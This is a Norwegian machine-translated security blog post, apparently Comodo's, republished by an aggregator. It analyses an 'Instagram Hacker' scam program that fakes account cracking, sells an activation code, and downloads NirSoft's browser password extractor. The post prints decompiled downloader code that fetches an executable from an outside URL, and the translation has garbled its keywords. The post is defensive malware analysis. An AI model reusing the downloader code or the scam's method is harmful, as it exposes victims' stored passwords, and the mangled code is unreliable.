Lesetid: 4 minutter
Mange tar ikke potensielt uønskede applikasjoner (PUA) som en alvorlig fare. Grunnen til en slik hensynsløs holdning er at PUA vanligvis installeres med samtykke fra brukeren. Men denne oppfatningen er en stor feil. Og ikke bare fordi en PUA i det skjulte kan installere andre programmer som adware eller spyware på en stasjon for nedlasting. Det levende eksempelet nedenfor analysert av Comodo Threat Research Labs eksperter viser tydelig at en PUA kan være et mye mer truende våpen.
Møt programvaren kalt "Instagram Hacker". Den har den offisielle nettsiden https://hackinstagram.net/ og lover … å hacke hvilken som helst Instagram-konto. Mer av det, du kan laste ned og installere det gratis.
Etter installasjonen ber den om å angi en Instagram-profil-URL og hacke passordet.
Resultatet kommer om noen sekunder:
Men etter å ha klikket på "Vis passord"-knappen, vises et nytt vindu:
Ved å klikke på "Få en aktiveringskode"-knappen omdirigeres til "Kjøp-side".
Den tilbyr å kjøpe "Aktiveringskode", men ... kan du lukte svindel i luften? Det er åpenbart, ingen programvare som kan bryte et Instagram-passord i sekunder, kan eksistere. Så er Instagram Hacker bare et annet bedragerverktøy for å lure enkle? Den beste måten å sjekke det på er å se inne i applikasjonskoden.
Koden er beskyttet med Dotnet Reactor, men kan dekodes med de4dot-verktøyet.
Og nå kan vi se at applikasjonen er et svindelverktøy. Det første fragmentet av kode forfalsker bare fremdriftsdemonstrasjonsindikator.
Men en annen er mer interessant. Som du kan se, inneholder den en URL med en kjørbar fil som kan lastes ned hvis aktiveringen var vellykket.
LoadingWindow()
{
Klasse2.qDiUy7EzyuIMj();
this.filename = "view.exe";
this.uri = new Uri(“http://software-logistics.net/external/component/download/view.exe”);
this.InitializeComponent();
if (File.Exists(this.filename))
{
File.Delete(dette.filnavn);
}
prøve
{
WebClient klient1 = ny WebClient();
client1.DownloadFileAsync(this.uri, this.filename);
client1.DownloadProgressChanged += ny DownloadProgressChangedEventHandler(this.method_1);
client1.DownloadFileCompleted += new AsyncCompletedEventHandler(this.method_2);
}
å fange
{
denne.metode_0();
}
}
}
}
Hvis vi kjører den kjørbare filen, vil vi finne ut at det er WebBrowserPassView-applikasjonen fra NirSoft:
https://www.nirsoft.net/utils/web_browser_password.html
WebBrowserPassView er bare et passordutvinningsverktøy som avslører passordene som er lagret av nettleserne. Så alle passord denne programvaren kan trekke ut er ikke Instagrams, men brukernes egne passord som lagres i deres nettlesere!
La oss fortsette: alt som Instagram Hacker gjør er å laste ned og lansere en annen PUA fra NirSoft. Så vi står åpenbart overfor et svindelverktøy. Legg merke til det manipulerende psykologiske trikset her: Hvis et offer oppdager at hun ble lurt, melder hun neppe politiet om hendelsen. For i så fall ville hun måtte tilstå at hun forsøkte å hacke Instagram, det vil si å begå en nettkriminalitet.
Men det er en tynn ende av kanten.
Den farligste trusselen er at URL-en i applikasjonen enkelt kan endres på en hvilken som helst annen med en ondsinnet fil som vil bli utført på et offers maskin. Så denne PUA – så vel som mange andre eksempler på slik skadevaretype – kan brukes til massiv spredning av ulike «tunge» skadelige programmer som trojanere, bakdører, ransomware og så videre
Og dette er en god grunn til å ta PUA som virkelig farlig skadelig programvare. For det kan vise seg å være et springbrett for et ødeleggende massivt nettangrep.
«I dag bør vi ikke vurdere malware som farlig eller ikke så farlig, sier Fatih Orhan, leder av Comodo Threat Research Labs. "Noen malware eksisterer ikke i et isolert rom. I dag bygger nettkriminelle lange skadevarekjeder for å angripe brukere, og, som du kan se, kan PUA være et ledd i en slik drapskjede. Så vi bør kalle spade en spade. Ja, disse applikasjonene lastes ned og kjøres med brukernes godkjenning, men som i dette tilfellet blir godkjenningen presset ut av svindel. Gjennom potensielt uønskede applikasjoner later til å være legitime, alle må forstå at det bare er en kamuflasje. Det er derfor Comodo ikke bare gir avansert teknisk beskyttelse, men informerer jevnlig brukere for å forhindre dem fra farlige feller i cyberspace.
Bo trygt med Comodo!
Relaterte ressurser
Wikipedia DDOS -angrep
malware Removal
Nettstedet skadelig programvare
Beste nettstedssikkerhet
WordPress Security
START GRATIS PRØVEPERIODE FÅ DIN KJENTE SIKKERHETSSCORECARD GRATIS
- SEO-drevet innhold og PR-distribusjon. Bli forsterket i dag.
- Platoblokkkjede. Web3 Metaverse Intelligence. Kunnskap forsterket. Tilgang her.
- kilde: https://blog.comodo.com/comodo-news/how-unwanted-applications-are-greater-security-threat/
- a
- I stand
- Om oss
- Logg inn
- Handling
- Aktivering
- Etter
- AIR
- Alle
- og
- En annen
- Søknad
- søknader
- godkjenning
- angripe
- holdning
- Bakdører
- basis
- fordi
- BEST
- Stor
- Blogg
- Break
- nettlesere
- bygge
- knapp
- kjøpe
- ring
- saken
- kjede
- kjeder
- sjekk
- klart
- kode
- begå
- samtykke
- Vurder
- inneholder
- Cyber angrep
- cybercrime
- nettkriminelle
- FARE
- Dangerous
- DDoS
- ødeleggende
- oppdager
- ikke
- dobbelt
- nedlasting
- lett
- Edge
- Enter
- etc
- Event
- eksempel
- eksempler
- eksperter
- trekke ut
- Face
- Noen få
- filet
- Finn
- Først
- svindel
- Gratis
- fra
- få
- god
- større
- hack
- hacker
- hode
- her.
- Hvordan
- Hvordan
- HTML
- HTTPS
- in
- hendelse
- Indikator
- installere
- instant
- interessant
- isolert
- IT
- Labs
- lansere
- LINK
- Lang
- Se
- maskin
- malware
- Malware-angrep
- mange
- massive
- max bredde
- feil
- mer
- mest
- oppkalt
- behov
- Ny
- Åpenbare
- Tilbud
- offisiell
- Offesiell nettside
- ONE
- Mening
- Annen
- egen
- Passord
- passord
- Ansatte
- PHP
- plato
- Platon Data Intelligence
- PlatonData
- Politiet
- potensielt
- forebygge
- Profil
- programmer
- Progress
- lover
- beskyttet
- beskyttelse
- gi
- realisere
- grunnen til
- uforsvarlig
- regelmessig
- Rapporter
- forskning
- resultere
- gjenoppta
- avslører
- Kvitt
- Kjør
- poengkort
- sekunder
- sikre
- sikkerhet
- alvorlig
- bør
- So
- Software
- Rom
- spyware
- lagret
- vellykket
- slik
- Ta
- Teknisk
- De
- deres
- trussel
- hele
- tid
- til
- verktøy
- feller
- SVING
- forstå
- uønsket
- URL
- Bruker
- Brukere
- vanligvis
- ulike
- Offer
- Se
- web
- Nettlesere
- Nettsted
- vil
- ville
- Du
- Din
- zephyrnet